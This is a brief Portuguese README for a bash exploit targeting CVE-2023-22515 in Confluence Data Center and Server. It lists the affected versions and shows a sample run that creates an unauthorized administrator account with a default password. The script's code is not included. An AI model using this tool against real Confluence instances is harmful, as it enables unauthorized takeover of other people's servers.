
Script Bash que explora o CVE-2023-22515 no Confluence Data Center e Server para criar contas de administrador não autorizadas, permitindo acesso não autorizado.
Um exploit simples em script bash para CVE-2023-22515.
As instâncias do Confluence Data Center e Server possuem uma vulnerabilidade de Controle de Acesso Quebrado (CVE-2023-22515), permitindo que atacantes criem contas de administrador não autorizadas no Confluence e acessem as instâncias do Confluence.
8.0.0
8.0.1
8.0.2
8.0.3
8.0.4
8.1.0
8.1.1
8.1.3
8.1.4
8.2.0
8.2.1
8.2.2
8.2.3
8.3.0
8.3.1
8.3.2
8.4.0
8.4.1
8.4.2
8.5.0
8.5.1
./xpl.sh [URL]
└─$ ./xpl.sh http://10.10.76.38:8090
[INFO] Verificando se o host é vulnerável...
Vulnerável --> Código de Resposta: 200
[+] Explorando o Alvo...
[+] Exploit Concluído!!!
[INFO] Usuário criado: a123456
[INFO] Senha criada: ChangeMe123